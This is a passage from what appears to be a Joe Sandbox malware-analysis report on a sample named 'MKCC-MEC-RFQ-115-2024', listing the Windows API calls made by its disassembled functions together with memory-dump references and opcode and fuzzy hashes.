                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: d5f805b6f6153fa295bf90928c6c41b68fb71317e2cc4414d850ad0e5f53b6a2
                                              • Instruction ID: 378670d6f286d2d32e42ac035b1eb95ed269bdf9555686a08619281de32deab6
                                              • Opcode Fuzzy Hash: d5f805b6f6153fa295bf90928c6c41b68fb71317e2cc4414d850ad0e5f53b6a2
                                              • Instruction Fuzzy Hash: 84317031A00B49AFCB18DF6EC8946ADB7B5FF48315F248A29D819A3710D771BD90DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 1afb8f976a681e4978e9fbd2dd3229803343824ed42113c3ea4f640466b98843
                                              • Instruction ID: 547fcc44e742aea06f35385ab8af9b0773cc266cf371afc5dfe46ea3a08d76c7
                                              • Opcode Fuzzy Hash: 1afb8f976a681e4978e9fbd2dd3229803343824ed42113c3ea4f640466b98843
                                              • Instruction Fuzzy Hash: 89415974608390CFDB24CF14C484B1ABBE0BF49314F1989ACE8895B762C335EC95CB42
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 5ad07f881251800a9ba56987d779fece19744a6f181f3a9ab101a5441c1c8796
                                              • Instruction ID: c0c001037a0c84bc44df87479b3995a21b6835e6230b0c5746a8f85006d7613b
                                              • Opcode Fuzzy Hash: 5ad07f881251800a9ba56987d779fece19744a6f181f3a9ab101a5441c1c8796
                                              • Instruction Fuzzy Hash: C721D231A04A08EBDB185F91EC856AE7FF8FF14390F21887AF885D2410EBB094E0D755
                                              APIs
                                                • Part of subcall function 000E4D13: FreeLibrary.KERNEL32(00000000,?), ref: 000E4D4D
                                                • Part of subcall function 0010548B: __wfsopen.LIBCMT ref: 00105496
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4F6F
                                                • Part of subcall function 000E4CC8: FreeLibrary.KERNEL32(00000000), ref: 000E4D02
                                                • Part of subcall function 000E4DD0: _memmove.LIBCMT ref: 000E4E1A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: 094ee7bc5da93dca321c92f33ae1e1b74afb94286805bb02330cde9275234e9d
                                              • Instruction ID: 875d18ee617678f278864451a383fb0e20a89fd2acebad8719941a93e75cd5a0
                                              • Opcode Fuzzy Hash: 094ee7bc5da93dca321c92f33ae1e1b74afb94286805bb02330cde9275234e9d
                                              • Instruction Fuzzy Hash: 7411E731A00209AECF14AF71DC52BEE77A59F40B11F20883DF545B71C2DB719A159B50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: faaa9a0de4887dc4e2540e0c5c319442552355f5a8de940854780935368be2d5
                                              • Instruction ID: ba5efdd07d1b10edf77a81584a2d1cd285066c40f2c59d8d6d48f1dbfb0fee4e
                                              • Opcode Fuzzy Hash: faaa9a0de4887dc4e2540e0c5c319442552355f5a8de940854780935368be2d5
                                              • Instruction Fuzzy Hash: 2D2130B4608391DFCB24DF24C884A1ABBE0BF89304F05896CF89A67762C731F855CB52
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID:
                                              • API String ID: 82841172-0
                                              • Opcode ID: 48c96470f25bc4dcb42ae76480deda8cab9f13fffe71f0f4789fc48a6e954c0f
                                              • Instruction ID: 7d1f62aadc9785fc55d1d6686c63da7358fea5f8cb82031c3f7cc506e53c821c
                                              • Opcode Fuzzy Hash: 48c96470f25bc4dcb42ae76480deda8cab9f13fffe71f0f4789fc48a6e954c0f
                                              • Instruction Fuzzy Hash: 8E111B3600F2C08FCB13C768DCD5A917FB6AE4B22430E41DAD4859F927D9A4981ADB62
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000E5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000E5D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 795a1b77ee6b6f96c06c6448b15014c67d19bd5b52d48211f6377344ffe64cd1
                                              • Instruction ID: dc10af9bdde309359314e5bb2b021b422f757f65ac2596b8b2e8f999704f92dc
                                              • Opcode Fuzzy Hash: 795a1b77ee6b6f96c06c6448b15014c67d19bd5b52d48211f6377344ffe64cd1
                                              • Instruction Fuzzy Hash: 57113631208B419FD3708F16CC88B66B7E9EF45769F10C92EE4AA96A50D7B0E945CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                              • Instruction ID: c4f4394a219e7bad37c47b8134d40d60ca82e541e8d67614747cd17e08e549ff
                                              • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                              • Instruction Fuzzy Hash: A001A2B9700982AFC305DB69C851D6AFBA9FF9A3147148569F859C7702DB70EC21CBE0
                                              APIs
                                              • __lock_file.LIBCMT ref: 00104AD6
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: 6122f6293c701f6a1184750cbc78fb4ad4db53b5386d41864788eef7a8dd642f
                                              • Instruction ID: 331155f6f97c2e30aa31e1dae07ccbab898fd15fe4906e1dd3663f02194b1e29
                                              • Opcode Fuzzy Hash: 6122f6293c701f6a1184750cbc78fb4ad4db53b5386d41864788eef7a8dd642f
                                              • Instruction Fuzzy Hash: E7F0AFB1A40209EBDF61BFB4CC4639E36A1AF20325F048524B5A5AB1D1CBF88A60DF55
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4FDE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 007924c6f68d3a6ba6fa5ab1575f2ae02ea00e3e8c1f258f9d21c804cb64c46f
                                              • Instruction ID: d75b06e766fece35ff50c8da2f6a0c7461002b933c36e9de3ede52379b6e9c64
                                              • Opcode Fuzzy Hash: 007924c6f68d3a6ba6fa5ab1575f2ae02ea00e3e8c1f258f9d21c804cb64c46f
                                              • Instruction Fuzzy Hash: D7F03971505752CFCB349F66E894816FBE1BF147293208A3EE1D692A10C771A880DF50
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: 6c3686e3fc99c2b201e203bee7547b12be8f7ca379c658d33221c385525ccf83
                                              • Instruction ID: c107956fabda3d4fd62ad6fc31f2d97ab93f2d13e1857849b7c1e9106381d64a
                                              • Opcode Fuzzy Hash: 6c3686e3fc99c2b201e203bee7547b12be8f7ca379c658d33221c385525ccf83
                                              • Instruction Fuzzy Hash: 6EE0CD7690422C5BC720D6589C05FFAB7FDDF88790F0401B5FD0CD7215E9A09CC18690
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction ID: fa01801f8994e8f3ee4174d1d6ae8ff656665f93ab45624ae716efe627fa35ad
                                              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction Fuzzy Hash: 0DE092B0104B005FD7348A24D8107E373E1AB16325F00081DF6DA83341EB6278418B59
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0011E16B,?,?,00000000), ref: 000E5DBF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: dabc6d6d2f661b8c15c1b76b184b95cacf9e1a9ce366fe7f498765502d61dd0f
                                              • Instruction ID: 153da9ceede05d3f0a449cdcf3d235b239cc686d62266088fc76a2e17e30c565
                                              • Opcode Fuzzy Hash: dabc6d6d2f661b8c15c1b76b184b95cacf9e1a9ce366fe7f498765502d61dd0f
                                              • Instruction Fuzzy Hash: 56D0C77564420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6F27D508795
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 59d609c8d034505adcd8e9b96316b398c3826094ff34e054479004b884af7223
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 71B09B7544010C77DF011D41EC02A553B195750674F404010FB0C18161A67395605585
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0014D46A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 59cdc44820f130c6af0d53c8265d35eb2542f6f61e3f32a02a20e45f0d30e46e
                                              • Instruction ID: 3aed390676b677f5d7e11983775c1b327a797e7766ff7680340ef2bf749d75db
                                              • Opcode Fuzzy Hash: 59cdc44820f130c6af0d53c8265d35eb2542f6f61e3f32a02a20e45f0d30e46e
                                              • Instruction Fuzzy Hash: 007154742083428FCB14EF25D491AAEB7E0BF98314F08496DF5969B2A2DF70ED45CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: bebdafbde304a508309a7850821c1fc7a9c1600cc519345488a5aef11963eb83
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: E431D770A00106DBC71ADF58C480A69F7A6FF5D300F658AA5E489DB691D771EDC1CB80
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction ID: 8c815606f2a22b20c61b9d386b4cf78b7e5af8a682bd60d4ab9503a95b352acb
                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction Fuzzy Hash: 90E0BF7498110EEFDB00EFA8D5496EE7BB4EF04311F1005A5FE05E7690DB309E548A62
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 749081f75b794bb7655f3a97efa9249d4f57179637944d3f3c237c7b2da5b36a
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 09E0E67498110EDFDB00EFB8D5496AE7FB4EF04311F100165FD01E2280D7309D508A72
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0016CE50
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016CE91
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0016CED6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0016CF00
                                              • SendMessageW.USER32 ref: 0016CF29
                                              • _wcsncpy.LIBCMT ref: 0016CFA1
                                              • GetKeyState.USER32(00000011), ref: 0016CFC2
                                              • GetKeyState.USER32(00000009), ref: 0016CFCF
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016CFE5
                                              • GetKeyState.USER32(00000010), ref: 0016CFEF
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0016D018
                                              • SendMessageW.USER32 ref: 0016D03F
                                              • SendMessageW.USER32(?,00001030,?,0016B602), ref: 0016D145
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0016D15B
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0016D16E
                                              • SetCapture.USER32(?), ref: 0016D177
                                              • ClientToScreen.USER32(?,?), ref: 0016D1DC
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0016D1E9
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0016D203
                                              • ReleaseCapture.USER32 ref: 0016D20E
                                              • GetCursorPos.USER32(?), ref: 0016D248
                                              • ScreenToClient.USER32(?,?), ref: 0016D255
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0016D2B1
                                              • SendMessageW.USER32 ref: 0016D2DF
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0016D31C
                                              • SendMessageW.USER32 ref: 0016D34B
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0016D36C
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0016D37B
                                              • GetCursorPos.USER32(?), ref: 0016D39B
                                              • ScreenToClient.USER32(?,?), ref: 0016D3A8
                                              • GetParent.USER32(?), ref: 0016D3C8
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0016D431
                                              • SendMessageW.USER32 ref: 0016D462
                                              • ClientToScreen.USER32(?,?), ref: 0016D4C0
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0016D4F0
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0016D51A
                                              • SendMessageW.USER32 ref: 0016D53D
                                              • ClientToScreen.USER32(?,?), ref: 0016D58F
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0016D5C3
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016D65F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$@U=u$F
                                              • API String ID: 3977979337-1007936534
                                              • Opcode ID: c0720c979cc1d16f581a6bc00ee926a5fbc9b51d0e7159df76c334490a59ce0e
                                              • Instruction ID: 952aa62af43eb65268fb1e55a362b1d8c3215bb730c3c12e260d4058021a0f46
                                              • Opcode Fuzzy Hash: c0720c979cc1d16f581a6bc00ee926a5fbc9b51d0e7159df76c334490a59ce0e
                                              • Instruction Fuzzy Hash: B142CB70605340AFC724CF28DC48EAABBF9FF49314F14451DF6A6976A1C77298A1CB92
                                              APIs
                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0016873F
                                              Strings
                                              Memory Dump Source
